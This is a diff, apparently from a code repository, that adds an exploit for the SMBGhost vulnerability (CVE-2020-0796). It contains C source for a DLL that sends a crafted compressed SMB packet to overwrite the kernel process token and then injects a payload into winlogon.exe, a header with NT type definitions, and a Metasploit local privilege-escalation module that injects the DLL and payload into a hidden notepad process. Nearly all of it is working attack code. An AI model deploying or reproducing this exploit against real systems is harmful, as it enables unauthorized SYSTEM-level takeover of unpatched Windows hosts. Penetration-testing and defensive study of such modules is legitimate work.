if ((err = send(sock, (const char*)packet, sizeof(buf) + 0x10 + len, 0)) != SOCKET_ERROR) {
|
||||
recv(sock, response, sizeof(response), 0);
|
||||
}
|
||||
|
||||
free(packet);
|
||||
return err;
|
||||
}
|
||||
|
||||
void inject(PMSF_PAYLOAD pMsfPayload) {
|
||||
PROCESSENTRY32 entry;
|
||||
entry.dwSize = sizeof(PROCESSENTRY32);
|
||||
|
||||
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
|
||||
int pid = -1;
|
||||
if (Process32First(snapshot, &entry) == TRUE) {
|
||||
while (Process32Next(snapshot, &entry) == TRUE) {
|
||||
if (lstrcmpiA(entry.szExeFile, "winlogon.exe") == 0) {
|
||||
pid = entry.th32ProcessID;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
CloseHandle(snapshot);
|
||||
|
||||
if (pid < 0) {
|
||||
return;
|
||||
}
|
||||
|
||||
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
|
||||
if (hProc == NULL) {
|
||||
return;
|
||||
}
|
||||
|
||||
LPVOID lpMem = VirtualAllocEx(hProc, NULL, pMsfPayload->dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (lpMem == NULL) {
|
||||
return;
|
||||
}
|
||||
if (!WriteProcessMemory(hProc, lpMem, &pMsfPayload->cPayloadData, pMsfPayload->dwSize, 0)) {
|
||||
return;
|
||||
}
|
||||
if (!CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, 0, 0, 0)) {
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
DWORD exploit(PMSF_PAYLOAD pMsfPayload) {
|
||||
WORD wVersionRequested = MAKEWORD(2, 2);
|
||||
WSADATA wsaData = { 0 };
|
||||
SOCKET sock = INVALID_SOCKET;
|
||||
uint64_t ktoken = 0;
|
||||
|
||||
int err = 0;
|
||||
|
||||
if ((err = WSAStartup(wVersionRequested, &wsaData)) != 0) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
if (sock == INVALID_SOCKET) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
SOCKADDR_IN client;
|
||||
client.sin_family = AF_INET;
|
||||
client.sin_port = htons(445);
|
||||
InetPton(AF_INET, "127.0.0.1", &client.sin_addr);
|
||||
|
||||
if (connect(sock, (SOCKADDR*)&client, sizeof(client)) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
if (send_negotiation(sock) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ULONG buffer_size = 0x1110;
|
||||
UCHAR* buffer = (UCHAR*)malloc(buffer_size);
|
||||
if (buffer == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ktoken = get_process_token();
|
||||
if (ktoken == 0) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
HMODULE ntdll = GetModuleHandle("ntdll.dll");
|
||||
if (ntdll == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
fpRtlGetCompressionWorkSpaceSize RtlGetCompressionWorkSpaceSize = (fpRtlGetCompressionWorkSpaceSize)GetProcAddress(ntdll, "RtlGetCompressionWorkSpaceSize");
|
||||
if (RtlGetCompressionWorkSpaceSize == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
fpRtlCompressBuffer RtlCompressBuffer = (fpRtlCompressBuffer)GetProcAddress(ntdll, "RtlCompressBuffer");
|
||||
if (RtlCompressBuffer == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
memset(buffer, 'A', 0x1108);
|
||||
*(uint64_t*)(buffer + 0x1108) = ktoken + 0x40; /* where we want to write */
|
||||
|
||||
ULONG CompressBufferWorkSpaceSize = 0;
|
||||
ULONG CompressFragmentWorkSpaceSize = 0;
|
||||
err = RtlGetCompressionWorkSpaceSize(COMPRESSION_FORMAT_XPRESS,
|
||||
&CompressBufferWorkSpaceSize, &CompressFragmentWorkSpaceSize);
|
||||
|
||||
if (err != STATUS_SUCCESS) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ULONG FinalCompressedSize;
|
||||
UCHAR compressed_buffer[64];
|
||||
LPVOID lpWorkSpace = malloc(CompressBufferWorkSpaceSize);
|
||||
if (lpWorkSpace == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
err = RtlCompressBuffer(COMPRESSION_FORMAT_XPRESS, buffer, buffer_size,
|
||||
compressed_buffer, sizeof(compressed_buffer), 4096, &FinalCompressedSize, lpWorkSpace);
|
||||
|
||||
if (err != STATUS_SUCCESS) {
|
||||
free(lpWorkSpace);
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
if (send_compressed(sock, compressed_buffer, FinalCompressedSize) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
inject(pMsfPayload);
|
||||
|
||||
WSACleanup();
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL bReturnValue = TRUE;
|
||||
switch (dwReason)
|
||||
{
|
||||
case DLL_QUERY_HMODULE:
|
||||
hAppInstance = hinstDLL;
|
||||
if (lpReserved != NULL)
|
||||
{
|
||||
*(HMODULE*)lpReserved = hAppInstance;
|
||||
}
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
exploit((PMSF_PAYLOAD)lpReserved);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return bReturnValue;
|
||||
}
|
|
@ -0,0 +1,245 @@
|
|||
#ifndef _EXPLOIT_H
|
||||
#define _EXPLOIT_H
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
|
||||
PVOID Object;
|
||||
ULONG_PTR UniqueProcessId;
|
||||
ULONG_PTR HandleValue;
|
||||
ULONG GrantedAccess;
|
||||
USHORT CreatorBackTraceIndex;
|
||||
USHORT ObjectTypeIndex;
|
||||
ULONG HandleAttributes;
|
||||
ULONG Reserved;
|
||||
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
|
||||
ULONG_PTR NumberOfHandles;
|
||||
ULONG_PTR Reserved;
|
||||
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
|
||||
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
|
||||
|
||||
typedef enum _SYSTEM_INFORMATION_CLASS {
|
||||
SystemBasicInformation = 0,
|
||||
SystemProcessorInformation = 1,
|
||||
SystemPerformanceInformation = 2,
|
||||
SystemTimeOfDayInformation = 3,
|
||||
SystemPathInformation = 4,
|
||||
SystemProcessInformation = 5,
|
||||
SystemCallCountInformation = 6,
|
||||
SystemDeviceInformation = 7,
|
||||
SystemProcessorPerformanceInformation = 8,
|
||||
SystemFlagsInformation = 9,
|
||||
SystemCallTimeInformation = 10,
|
||||
SystemModuleInformation = 11,
|
||||
SystemLocksInformation = 12,
|
||||
SystemStackTraceInformation = 13,
|
||||
SystemPagedPoolInformation = 14,
|
||||
SystemNonPagedPoolInformation = 15,
|
||||
SystemHandleInformation = 16,
|
||||
SystemObjectInformation = 17,
|
||||
SystemPageFileInformation = 18,
|
||||
SystemVdmInstemulInformation = 19,
|
||||
SystemVdmBopInformation = 20,
|
||||
SystemFileCacheInformation = 21,
|
||||
SystemPoolTagInformation = 22,
|
||||
SystemInterruptInformation = 23,
|
||||
SystemDpcBehaviorInformation = 24,
|
||||
SystemFullMemoryInformation = 25,
|
||||
SystemLoadGdiDriverInformation = 26,
|
||||
SystemUnloadGdiDriverInformation = 27,
|
||||
SystemTimeAdjustmentInformation = 28,
|
||||
SystemSummaryMemoryInformation = 29,
|
||||
SystemMirrorMemoryInformation = 30,
|
||||
SystemPerformanceTraceInformation = 31,
|
||||
SystemObsolete0 = 32,
|
||||
SystemExceptionInformation = 33,
|
||||
SystemCrashDumpStateInformation = 34,
|
||||
SystemKernelDebuggerInformation = 35,
|
||||
SystemContextSwitchInformation = 36,
|
||||
SystemRegistryQuotaInformation = 37,
|
||||
SystemExtendServiceTableInformation = 38,
|
||||
SystemPrioritySeperation = 39,
|
||||
SystemVerifierAddDriverInformation = 40,
|
||||
SystemVerifierRemoveDriverInformation = 41,
|
||||
SystemProcessorIdleInformation = 42,
|
||||
SystemLegacyDriverInformation = 43,
|
||||
SystemCurrentTimeZoneInformation = 44,
|
||||
SystemLookasideInformation = 45,
|
||||
SystemTimeSlipNotification = 46,
|
||||
SystemSessionCreate = 47,
|
||||
SystemSessionDetach = 48,
|
||||
SystemSessionInformation = 49,
|
||||
SystemRangeStartInformation = 50,
|
||||
SystemVerifierInformation = 51,
|
||||
SystemVerifierThunkExtend = 52,
|
||||
SystemSessionProcessInformation = 53,
|
||||
SystemLoadGdiDriverInSystemSpace = 54,
|
||||
SystemNumaProcessorMap = 55,
|
||||
SystemPrefetcherInformation = 56,
|
||||
SystemExtendedProcessInformation = 57,
|
||||
SystemRecommendedSharedDataAlignment = 58,
|
||||
SystemComPlusPackage = 59,
|
||||
SystemNumaAvailableMemory = 60,
|
||||
SystemProcessorPowerInformation = 61,
|
||||
SystemEmulationBasicInformation = 62,
|
||||
SystemEmulationProcessorInformation = 63,
|
||||
SystemExtendedHandleInformation = 64,
|
||||
SystemLostDelayedWriteInformation = 65,
|
||||
SystemBigPoolInformation = 66,
|
||||
SystemSessionPoolTagInformation = 67,
|
||||
SystemSessionMappedViewInformation = 68,
|
||||
SystemHotpatchInformation = 69,
|
||||
SystemObjectSecurityMode = 70,
|
||||
SystemWatchdogTimerHandler = 71,
|
||||
SystemWatchdogTimerInformation = 72,
|
||||
SystemLogicalProcessorInformation = 73,
|
||||
SystemWow64SharedInformationObsolete = 74,
|
||||
SystemRegisterFirmwareTableInformationHandler = 75,
|
||||
SystemFirmwareTableInformation = 76,
|
||||
SystemModuleInformationEx = 77,
|
||||
SystemVerifierTriageInformation = 78,
|
||||
SystemSuperfetchInformation = 79,
|
||||
SystemMemoryListInformation = 80,
|
||||
SystemFileCacheInformationEx = 81,
|
||||
SystemThreadPriorityClientIdInformation = 82,
|
||||
SystemProcessorIdleCycleTimeInformation = 83,
|
||||
SystemVerifierCancellationInformation = 84,
|
||||
SystemProcessorPowerInformationEx = 85,
|
||||
SystemRefTraceInformation = 86,
|
||||
SystemSpecialPoolInformation = 87,
|
||||
SystemProcessIdInformation = 88,
|
||||
SystemErrorPortInformation = 89,
|
||||
SystemBootEnvironmentInformation = 90,
|
||||
SystemHypervisorInformation = 91,
|
||||
SystemVerifierInformationEx = 92,
|
||||
SystemTimeZoneInformation = 93,
|
||||
SystemImageFileExecutionOptionsInformation = 94,
|
||||
SystemCoverageInformation = 95,
|
||||
SystemPrefetchPatchInformation = 96,
|
||||
SystemVerifierFaultsInformation = 97,
|
||||
SystemSystemPartitionInformation = 98,
|
||||
SystemSystemDiskInformation = 99,
|
||||
SystemProcessorPerformanceDistribution = 100,
|
||||
SystemNumaProximityNodeInformation = 101,
|
||||
SystemDynamicTimeZoneInformation = 102,
|
||||
SystemCodeIntegrityInformation = 103,
|
||||
SystemProcessorMicrocodeUpdateInformation = 104,
|
||||
SystemProcessorBrandString = 105,
|
||||
SystemVirtualAddressInformation = 106,
|
||||
SystemLogicalProcessorAndGroupInformation = 107,
|
||||
SystemProcessorCycleTimeInformation = 108,
|
||||
SystemStoreInformation = 109,
|
||||
SystemRegistryAppendString = 110,
|
||||
SystemAitSamplingValue = 111,
|
||||
SystemVhdBootInformation = 112,
|
||||
SystemCpuQuotaInformation = 113,
|
||||
SystemNativeBasicInformation = 114,
|
||||
SystemErrorPortTimeouts = 115,
|
||||
SystemLowPriorityIoInformation = 116,
|
||||
SystemBootEntropyInformation = 117,
|
||||
SystemVerifierCountersInformation = 118,
|
||||
SystemPagedPoolInformationEx = 119,
|
||||
SystemSystemPtesInformationEx = 120,
|
||||
SystemNodeDistanceInformation = 121,
|
||||
SystemAcpiAuditInformation = 122,
|
||||
SystemBasicPerformanceInformation = 123,
|
||||
SystemQueryPerformanceCounterInformation = 124,
|
||||
SystemSessionBigPoolInformation = 125,
|
||||
SystemBootGraphicsInformation = 126,
|
||||
SystemScrubPhysicalMemoryInformation = 127,
|
||||
SystemBadPageInformation = 128,
|
||||
SystemProcessorProfileControlArea = 129,
|
||||
SystemCombinePhysicalMemoryInformation = 130,
|
||||
SystemEntropyInterruptTimingInformation = 131,
|
||||
SystemConsoleInformation = 132,
|
||||
SystemPlatformBinaryInformation = 133,
|
||||
SystemPolicyInformation = 134,
|
||||
SystemHypervisorProcessorCountInformation = 135,
|
||||
SystemDeviceDataInformation = 136,
|
||||
SystemDeviceDataEnumerationInformation = 137,
|
||||
SystemMemoryTopologyInformation = 138,
|
||||
SystemMemoryChannelInformation = 139,
|
||||
SystemBootLogoInformation = 140,
|
||||
SystemProcessorPerformanceInformationEx = 141,
|
||||
SystemSpare0 = 142,
|
||||
SystemSecureBootPolicyInformation = 143,
|
||||
SystemPageFileInformationEx = 144,
|
||||
SystemSecureBootInformation = 145,
|
||||
SystemEntropyInterruptTimingRawInformation = 146,
|
||||
SystemPortableWorkspaceEfiLauncherInformation = 147,
|
||||
SystemFullProcessInformation = 148,
|
||||
SystemKernelDebuggerInformationEx = 149,
|
||||
SystemBootMetadataInformation = 150,
|
||||
SystemSoftRebootInformation = 151,
|
||||
SystemElamCertificateInformation = 152,
|
||||
SystemOfflineDumpConfigInformation = 153,
|
||||
SystemProcessorFeaturesInformation = 154,
|
||||
SystemRegistryReconciliationInformation = 155,
|
||||
SystemEdidInformation = 156,
|
||||
SystemManufacturingInformation = 157,
|
||||
SystemEnergyEstimationConfigInformation = 158,
|
||||
SystemHypervisorDetailInformation = 159,
|
||||
SystemProcessorCycleStatsInformation = 160,
|
||||
SystemVmGenerationCountInformation = 161,
|
||||
SystemTrustedPlatformModuleInformation = 162,
|
||||
SystemKernelDebuggerFlags = 163,
|
||||
SystemCodeIntegrityPolicyInformation = 164,
|
||||
SystemIsolatedUserModeInformation = 165,
|
||||
SystemHardwareSecurityTestInterfaceResultsInformation = 166,
|
||||
SystemSingleModuleInformation = 167,
|
||||
SystemAllowedCpuSetsInformation = 168,
|
||||
SystemDmaProtectionInformation = 169,
|
||||
SystemInterruptCpuSetsInformation = 170,
|
||||
SystemSecureBootPolicyFullInformation = 171,
|
||||
SystemCodeIntegrityPolicyFullInformation = 172,
|
||||
SystemAffinitizedInterruptProcessorInformation = 173,
|
||||
SystemRootSiloInformation = 174,
|
||||
SystemCpuSetInformation = 175,
|
||||
SystemCpuSetTagInformation = 176,
|
||||
SystemWin32WerStartCallout = 177,
|
||||
SystemSecureKernelProfileInformation = 178,
|
||||
SystemCodeIntegrityPlatformManifestInformation = 179,
|
||||
SystemInterruptSteeringInformation = 180,
|
||||
SystemSupportedProcessorArchitectures = 181,
|
||||
SystemMemoryUsageInformation = 182,
|
||||
SystemCodeIntegrityCertificateInformation = 183,
|
||||
SystemPhysicalMemoryInformation = 184,
|
||||
SystemControlFlowTransition = 185,
|
||||
SystemKernelDebuggingAllowed = 186,
|
||||
SystemActivityModerationExeState = 187,
|
||||
SystemActivityModerationUserSettings = 188,
|
||||
SystemCodeIntegrityPoliciesFullInformation = 189,
|
||||
SystemCodeIntegrityUnlockInformation = 190,
|
||||
SystemIntegrityQuotaInformation = 191,
|
||||
SystemFlushInformation = 192,
|
||||
SystemProcessorIdleMaskInformation = 193,
|
||||
SystemSecureDumpEncryptionInformation = 194,
|
||||
SystemWriteConstraintInformation = 195,
|
||||
SystemKernelVaShadowInformation = 196,
|
||||
SystemHypervisorSharedPageInformation = 197,
|
||||
SystemFirmwareBootPerformanceInformation = 198,
|
||||
SystemCodeIntegrityVerificationInformation = 199,
|
||||
SystemFirmwarePartitionInformation = 200,
|
||||
SystemSpeculationControlInformation = 201,
|
||||
SystemDmaGuardPolicyInformation = 202,
|
||||
SystemEnclaveLaunchControlInformation = 203,
|
||||
SystemWorkloadAllowedCpuSetsInformation = 204,
|
||||
SystemCodeIntegrityUnlockModeInformation = 205,
|
||||
SystemLeapSecondInformation = 206,
|
||||
SystemFlags2Information = 207,
|
||||
SystemSecurityModelInformation = 208,
|
||||
SystemCodeIntegritySyntheticCacheInformation = 209,
|
||||
MaxSystemInfoClass
|
||||
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
|
||||
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
||||
|
||||
typedef ULONG NTSTATUS;
|
||||
|
||||
typedef NTSTATUS(WINAPI* fpRtlGetCompressionWorkSpaceSize)(USHORT, PULONG, PULONG);
|
||||
typedef NTSTATUS(WINAPI* fpRtlCompressBuffer)(USHORT, PUCHAR, ULONG, PUCHAR, ULONG, ULONG, PULONG, PVOID);
|
||||
typedef NTSTATUS(WINAPI* fpNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
#endif
|
|
@ -0,0 +1,133 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
include Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'SMBv3 Compression Buffer Overflow',
|
||||
'Description' => %q{
|
||||
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
|
||||
execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself
|
||||
before injecting a payload into winlogon.exe.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Daniel García Gutiérrez', # original LPE exploit
|
||||
'Manuel Blanco Parajón', # original LPE exploit
|
||||
'Spencer McIntyre' # metasploit module
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2020-0796' ],
|
||||
[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
|
||||
[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
|
||||
],
|
||||
'DisclosureDate' => '2020-03-13',
|
||||
'DefaultTarget' => 0,
|
||||
'AKA' => [ 'SMBGhost' ],
|
||||
'Notes' =>
|
||||
{
|
||||
'Stability' => [ CRASH_OS_RESTARTS, ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ],
|
||||
},
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
sysinfo_value = sysinfo["OS"]
|
||||
|
||||
if sysinfo_value !~ /windows/i
|
||||
# Non-Windows systems are definitely not affected.
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
vprint_status("Windows Build Number = #{build_num}")
|
||||
# see https://docs.microsoft.com/en-us/windows/release-information/
|
||||
unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)
|
||||
print_error('The exploit only supports Windows 10 versions 1903 - 1909')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
disable_compression = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters","DisableCompression")
|
||||
if !disable_compression.nil? && disable_compression != 0
|
||||
print_error('The exploit requires compression to be enabled')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
# NOTE: Automatic check is implemented by the AutoCheck mixin
|
||||
super
|
||||
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] == ARCH_X64 && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] == ARCH_X86 && target.arch.first == ARCH_X64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Reader Sandbox won't allow to create a new process:
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_error('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
encoded_payload = payload.encoded
|
||||
payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue